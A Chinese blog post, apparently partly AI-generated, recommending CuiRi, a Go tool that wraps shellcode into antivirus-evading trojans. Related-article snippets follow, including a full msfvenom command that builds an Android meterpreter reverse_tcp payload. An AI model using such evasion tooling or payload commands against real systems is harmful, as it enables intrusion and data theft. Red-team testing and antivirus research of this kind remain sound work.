推荐:摧日——CuiRi 红队专用免杀木马生成工具

最新推荐文章于 2024-10-22 16:06:06 发布
原创 最新推荐文章于 2024-10-22 16:06:06 发布 · 695 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

推荐:摧日——CuiRi 红队专用免杀木马生成工具

项目地址:https://gitcode.com/gh_mirrors/cu/CuiRi

0x01 项目介绍

在网络安全领域,红队行动是一种模拟攻击者行为的安全测试方式,而【摧日】CuiRi 正是一款专为此设计的工具。这是一款基于Golang开发的免杀木马生成器,能够帮助红队人员快速构建出能够绕过主流杀毒软件检测的木马程序。它的核心理念是利用 Shellcode 技术,以达到极致的免杀效果。

0x02 项目技术分析

CuiRi 的技术亮点在于其基于 Syscall 实现的免杀机制,通过随机混淆技术使生成的木马能有效避开杀软的查杀。不仅如此,工具还集成了 go-strip 功能,进一步对 Go 编译后的代码进行信息抹除和混淆处理,提高了隐蔽性。由于其轻量化的设计(只有一个exe文件),配合Go语言环境,用户可以轻松地部署和使用。

0x03 应用场景

对于网络安全团队和红队成员来说,CuiRi 能够在渗透测试过程中提供强大的支持。它可以帮助测试者在不触发防御系统的前提下,实现恶意代码的植入,从而更好地评估目标系统的安全性。同时,对于研究反病毒策略和技术的专家而言,这款工具也是一个极具价值的研究对象。

0x04 项目特点

  1. 极致免杀:基于 Syscall 和随机混淆技术,使得生成的木马几乎无法被杀软检测。
  2. 高效隐蔽:集成 go-strip 功能,消除编译信息,混淆程序结构,提高隐蔽性。
  3. 简洁便携:只有一个可执行文件,无需复杂配置,易于使用。
  4. 灵活输入:支持C语言字符串格式和纯十六进制数值格式的 Shellcode 输入。

0x05 使用说明

用户只需下载最新的二进制文件,确保已安装 Go 语言环境,然后将自定义的 Shellcode 存入文本文件,即可通过简单命令行操作生成免杀木马。

友情提示: 请务必遵守法律法规,仅限于合法的企业内部安全测试,不得用于非法目的。

总结,CuiRi 是一款强大且实用的红队工具,凭借其独特的免杀技术和简便的操作流程,能够在渗透测试中发挥巨大作用。如果你身处网络安全行业,或是对此类工具有着浓厚的兴趣,那么 CuiRi 绝对值得你尝试和信赖。

CuiRi 一款红队专用免杀木马生成器,基于shellcode生成绕过所有杀软的木马。 项目地址: https://gitcode.com/gh_mirrors/cu/CuiRi

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

杀和绕过研究
SHELLCODE_8BIT的博客
03-15 1797
1.Linux下命令混淆 2.webshell混淆 3.远控杀,各种静态动态 linux命令执行绕过,命令执行WAF绕过技巧总结_tegrodikk的博客-优快云博客
安全攻防之BadUsb攻击之CS上线
wjwqp的专栏
05-28 1851
一、环境和准备 1.win7 X64系统 2.arduino Leonardo板子一块 3.cs4.4服务器(Linux已经启动CS并配置好监听器,本文不做讨论,感兴趣的自行百度) win7安装好Leonardo板子驱动,后显示结果如下 Com3端口,烧录时候会用到; HID编译工具,arduino-1.5.5-r2, 二、编译和上传代码到Leonardo板子 将Leonardo板子插入电脑,安装完驱动后选择好对应的板子和对应的Com口,如下...
Ani网页木马生成
BlueXray's Security Blog
04-02 4384
图片: =700) window.open(http://bbs.cbhu.org/attachment/30_4_d69222937daa786.jpg);" alt="" onload="if(this.width>700)this.width=700;if(this.height>700)this.height=700;" border="0" src="http://b
新型安卓木马SpyNote生成器遭泄露
weixin_34347651的博客
09-04 5006
本文讲的是新型安卓木马SpyNote生成器遭泄露,近,Palo Alto Networks 威胁情报团队Unit42 宣布发现一类新型安卓木马SpyNote,该木马可执行远程入侵功能,其生成器近在多个恶意软件论坛上遭泄露。 SpyNoted与知名的RAT (Remote Administration Tools, RAT) 程序OmniRat 和 D...
Metasploit生成Android木马远控自己的安卓设备
qq_59235193的博客
01-15 6590
我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网
手机android.sys木马,使用kali生成木马入侵安卓手机
weixin_42353186的博客
05-29 7661
大家好,我是T0reAd今天给大家带来的是使用kali生成行动开始先查看kali的ip,我的是1.114然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk5555是设置的端口,可以自己更改显示这个说明已经生成成功了然后启动msf:msfconsol...
常见web安全漏洞介绍
xunyunai9767的博客
11-17 630
介绍常见web漏洞,参考OWASP top10漏洞,pikachu靶场
msfvenom木马生成工具
weixin_45605313的博客
07-12 1743
msfvenom命令 命令
14、TheFatRat木马生成工具-创建后门或payload
无痕的博客
12-14 3051
TheFatRat木马生成工具创建后门或payload
【木马生成工具】Msfvenom介绍及利用
Sagittarius32的博客
07-14 5790
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8起,msfvenom替换了msfpayload和msfencode。...
kalilinux生成安卓木马(仅供学习使用)
热门推荐
qq_51999794的博客
07-27 2万+
kalilinux生成安卓木马——盗取手机数据、控制后台拍照、录像 一、前期准备工作 1.1虚拟机安装好kalilinux 链接:https://pan.baidu.com/s/10rcLYOGYKQb0pETqJLbD4A 提取码:p4dq (本身是想要给你们网站的但是那个包我找不到在哪下载的了,不想要网盘的可以去清华镜像/阿里镜像找找看) 上述是kalilinux的光盘镜像。 1.1.1kalilinux的安装 这个过程有点复杂,我之后再发博客详细讲解下kalilinux的安装。 1.1.2安装之后 打
小心被黑,木马生成器碰不得(图)
要饭's Blog
07-15 1748
2005年注定是网络游戏盛行的一年,木马这个名词我想各位一定不陌生吧?游戏账号被人偷窃屡见不鲜。很多玩家因为报复的心理也想方设法去偷取其他人的号,于是木马横行,但其实……  现在,网上有很多盗号木马生成工具,只要设置好E-mail的用户名及该E-mail的密码,就可以盗号了。可你是否知道这个木马是包含后门的?在你用它来帮你盗号的同时,盗取的用户名及密码也都会发送给木马作者一份,而我们就是要利用嗅探
msf-Msfvenonm生成后门木马
weixin_45588247的博客
08-27 2万+
msf-Msfvenonm生成后门木马实验 文章目录msf-Msfvenonm生成后门木马实验一、工具:二、实验环境:三、`msfvenom`简介:四、各平台生成木马的方法:五、生成反向反弹木马:1. windows平台:1.1 生成反弹木马:1.2 捆绑一个程序伪装木马:2. :3. :4. :1.1 :2.1 :五、实验过程:1. :1.1 :1.1.1 : 一、工具: Metasploit Framework(MSF)漏洞利用框架 二、实验环境: 靶   机: windows10虚拟机:192.
msfvenom生成木马-windows
最新发布
aheyor的博客
10-22 682
通常使用 Kali Linux(例如 Kali 2021.3)作为攻击系统,目标靶机为 Windows 10 专业版。请注意,这些步骤仅适用于合法的安全测试和学习目的。未经授权使用这些技术侵犯他人计算机系统是非法的。是 Metasploit 框架中的一个独立有效载荷生成器,它是。的替代品,用于生成后门程序。
生成木马病毒
qq_37250297的博客
08-07 6815
一信息收集:     1根据条件生成密码字典:   选择条件的字符     生成对应的字典       对对应的网段进行主机存活扫描: nmap -sP 192.168.183.0/24  分析那个网段是靶子计算机由于本网段的ip为183.129 且网管和服务器占据了183.1和183.2和183.254 剩下的2个ip,由于开了两个网卡,再次我们不妨定下靶子计算机...
探秘MaliciousMacroGenerator:一款创新的宏病毒生成工具
gitblog_00067的博客
04-11 344
探秘MaliciousMacroGenerator:一款创新的宏病毒生成工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个开源项目,旨在为安全研究人员和渗透测试人员提供一个生成恶意宏的工具。通过这个项目,用户可以创建自定义的Microsoft Office文档,这些文档内嵌有恶意宏代码,用于模拟或研究宏病毒的传播机制。 技术分析 MaliciousMacroG...
千机:红队杀木马自动生成器 - 一键打造你的攻防利器
gitblog_00055的博客
05-25 695
千机:红队杀木马自动生成器 - 一键打造你的攻防利器 去发现同类优质开源项目:https://gitcode.com/ 项目简介 在信息安全领域,攻防对抗是一场永不停歇的较量。"千机"是由Hyyrent开发的一款创新性的红队工具,它是一款专为安全研究人员和攻防竞赛参与者设计的杀木马自动生成器。只需简单的操作,你就能轻松创建难以被杀毒软件察觉的Stageless木马文件,极...
杀实战知识汇总~
Ms08067安全实验室
09-21 577
“第二期”2022.9.30开班第二期新增:除了对课程进行了优化,另增加了2节课,杀实战中的常见技法,dll文件及编写和反沙盒和反调试机制;常见的恶意代码中的加壳和常见的恶意代码中的脱壳。杀,wiki百科:反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孔岱怀

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值